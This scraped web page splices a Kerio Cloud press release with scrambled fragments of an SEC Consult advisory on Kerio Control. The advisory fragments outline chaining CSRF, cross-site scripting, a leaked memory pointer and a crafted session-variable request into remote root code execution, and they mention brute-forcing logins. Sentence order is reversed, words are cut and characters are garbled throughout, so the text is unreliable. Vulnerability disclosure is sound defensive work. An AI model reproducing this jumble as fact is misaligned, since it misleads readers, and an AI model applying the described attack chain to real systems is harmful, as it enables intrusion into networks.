![]() Kerio will provide its partners with private virtual machines running Kerio Connect 8 in the cloud with some basic configuration. The way it works: Kerio Cloud is a hosted infrastructure service that allows Kerio partners to resell Kerio “Software as a Service” to their end customers, eliminating the need to purchase and maintain their own server environments. Our private cloud not only eliminates the need for partners to carry the hardware burden, it allows them to focus their energy on adding value instead of worrying about the availability of email services.” “While customer data suggests that onsite servers are still very popular, we think Kerio Cloud is the most secure and flexible solution for the IT guy that is looking for an alternative, but is still evaluating the cloud. “Pundits have touted cloud services and predicted the demise of on-premise solutions for a few years now,” said Scott Schreiman, CEO, Kerio Technologies. Unlike cloud email solutions such as Microsoft Office 365 or Google Apps, Kerio offers its customers a private cloud experience, which in turn allows them more control over their own data. The first Kerio Cloud offering will be the company’s flagship product, Kerio Connect 8, a messaging (email) and calendaring server. This is possibleīecause /internal/photo will only return a valid image if the user isĬurrently logged in.Kerio Technologies have launched a new cloud service infrastructure for its partners and customers.Īlthough Kerio previously enabled its channel partners to host Kerio Connect on their own hardware using the SaaS model, this marks Kerio’s first major push into true, hosted infrastructure services. Response (SOP would not allow to read the response). A remote attackerĬan detect if the credentials are correct without reading the Parameters kerio_username and kerio_password set. It's enough to send a POST request to /internal/dologin.php with the Valid credentials can be obtained via a brute-force attack. The attack from the Internet to obtain a reverse shell on Kerio Control.ĩ) Login not protected against brute-force attacks The complete attack can also beĬonducted via the cross site scripting vulnerability described in thisĪdvisory (XSS in contentLoader.php). This will bind a root shell on port 9999. The image can be uploaded in the administrative web interface. He can now easily bypass ASLR and DEP.Ĩ) Remote Code Execution as administratorĪn attacker can create a malicious upgrade image with the following ) Now the attacker knows the location of a stack (all stacks are marked as Pointer can be used to calculate the base address of a stack. ) If the memory pointer points near a stack (highest nibble is 0xb), the In such a case the RCE vulnerabilityĬan be used to crash and restart the server. ) If the memory pointer is within a specific range (e.g. GetLoginType.js.php to obtain a memory pointer. This means the attacker can send requests to ) The XSS payload runs on the same domain and can therefore send requestsĪnd read responses. ) The attacker's website iframes the Kerio Control website to trigger the Vulnerability to embed a malicious script inside the Kerio Control website ) The attacker's website uses the CSRF bypass and the identified XSS ) The attacker tricks a victim to visit the attacker's malicious website K_loginParams.k_loginType = "loginCommon" k_loginParams.k_nonauthToken = "0xb2ee208" Server: Kerio Control Embedded Web Server ![]() The pointer will also be disclosed if the user is already logged out. During the analysis noįurther effort was spent on analysing this behaviour. The target location always stores the same data. Into a readable and writeable region behind a stack-region. ![]() However, sometimes this pointer will point The above response contains a valid pointer (0xb59066a8). K_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18: Product: Kerio Control Unified Threat ManagementĬontent-Type: application/x-www-form-urlencoded Title: Potential backdoor access through multiple vulnerabilities ![]() SEC Consult Vulnerability Lab Security Advisory Exploit code has been developed as well but willī/2016/09/controlling-kerio-control-when-your.html Of the vulnerabilities within this advisory in detail and a video which SEC Consult has also released a blog post describing the attack scenarios ![]()
0 Comments
Leave a Reply. |